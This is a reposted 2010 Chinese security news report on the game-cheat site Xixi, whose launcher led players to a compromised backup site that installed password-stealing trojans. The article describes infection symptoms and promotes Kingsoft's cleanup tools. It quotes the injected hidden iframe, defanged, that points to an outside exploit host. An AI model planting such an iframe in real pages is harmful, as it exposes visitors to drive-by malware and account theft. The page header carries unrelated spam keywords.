免费**毛片在线播放,欧美三级在线视频,中文字幕国产一区

亚洲视频二区_亚洲欧洲日本天天堂在线观看_日韩一区二区在线观看_中文字幕不卡一区

公告：魔扣目錄網(wǎng)為廣大站長(zhǎng)提供免費(fèi)收錄網(wǎng)站服務(wù)，提交前請(qǐng)做好本站友鏈：【網(wǎng)站目錄：http://www.430618.com 】，免友鏈快審服務(wù)（50元/站），

網(wǎng)站：51998
待審：31
小程序：12
文章：1030137
會(huì)員：747

首頁(yè) > 新聞資訊 > 科技前沿 >正文

西西游戲網(wǎng)疑似被入侵，外掛玩家中木馬風(fēng)險(xiǎn)加劇

發(fā)布時(shí)間：2010-06-18 15:24:23 作者：網(wǎng)友整理

金山毒霸安全實(shí)驗(yàn)室監(jiān)測(cè)6月17日消息，金山網(wǎng)盾云端數(shù)據(jù)突然監(jiān)測(cè)到西西游戲網(wǎng)的當(dāng)日外掛下載均報(bào)危險(xiǎn)。西西游戲網(wǎng)是深受外掛玩家歡迎的游戲外掛下載網(wǎng)站，外掛玩家出于對(duì)西西游戲網(wǎng)的信任，很可能認(rèn)為殺毒軟件誤報(bào)西西游戲網(wǎng)下載的外掛程序，若不幸中毒，可使用金山急救箱快速恢復(fù)系統(tǒng)，安裝了金山網(wǎng)盾的用戶(hù)將不會(huì)受害。

免費(fèi)下載金山網(wǎng)盾:http://www.duba.net/wangdun/

金山毒霸安全專(zhuān)家對(duì)西西游戲網(wǎng)的異常情況進(jìn)行了詳細(xì)檢查，結(jié)果發(fā)現(xiàn)是西西游戲網(wǎng)近日提供了一個(gè)西西游戲登錄器，這個(gè)登錄器的作用是在西西游戲網(wǎng)不能登錄時(shí)，使用登錄器訪問(wèn)備用網(wǎng)站。但很不幸，這個(gè)備用網(wǎng)站被入侵，或備用網(wǎng)站出于某些原因被人為植入木馬。當(dāng)外掛玩家訪問(wèn)備用網(wǎng)站時(shí)，會(huì)下載大量盜號(hào)木馬。安裝了金山網(wǎng)盾的玩家在打開(kāi)西西游戲登錄器訪問(wèn)到掛馬頁(yè)面時(shí)，金山網(wǎng)盾會(huì)立即彈出報(bào)警。

分析發(fā)現(xiàn)掛馬的方式是在正常頁(yè)面中插入<iframe src= hxxp://www.9966.org:8801/user/Zr02/index.html width=100 height=0></iframe>

其中hxxp://www.9966.org:8801/user/Zr02/index.html頁(yè)利用系統(tǒng)多個(gè)漏洞掛馬，訪問(wèn)時(shí)會(huì)下載大量盜號(hào)木馬，下圖中的js文件實(shí)際全部為PE文件（可執(zhí)行程序）。

若外掛玩家不慎中招，會(huì)發(fā)現(xiàn)系統(tǒng)速度變慢。在開(kāi)始、運(yùn)行，輸入%Temp%，會(huì)發(fā)現(xiàn)temp文件夾下出現(xiàn)大量隱藏屬性的DLL文件

訪問(wèn)西西游戲網(wǎng)不慎中毒之后，會(huì)在temp文件夾發(fā)現(xiàn)大量DLL病毒

中毒后的電腦會(huì)發(fā)現(xiàn)桌面快捷方式小箭頭不見(jiàn)了，這是病毒修改了桌面快捷方式的屬性。

查看被修改后的桌面快捷方式屬性，會(huì)發(fā)現(xiàn)對(duì)應(yīng)的打開(kāi)方式已被修改為wscript.exe

使用金山急救箱快速清除病毒，恢復(fù)被破壞的系統(tǒng)

金山毒霸反病毒專(zhuān)家指出，西西游戲網(wǎng)被掛馬的頁(yè)面已被管理員發(fā)現(xiàn)清除，目前尚無(wú)法得知這是網(wǎng)站被黑客入侵還是其它人為原因。金山安全專(zhuān)家提醒游戲玩家，特別是偏好使用外掛的游戲玩家務(wù)必小心，推薦安裝金山網(wǎng)盾攔截可能的威脅。

已經(jīng)不幸中招的外掛玩家，可以使用金山急救箱來(lái)清除病毒，修復(fù)被破壞的系統(tǒng)。

分享到：

標(biāo)簽：西西游戲網(wǎng)疑似被入侵外掛玩家中木馬風(fēng)險(xiǎn)加劇業(yè)界動(dòng)態(tài)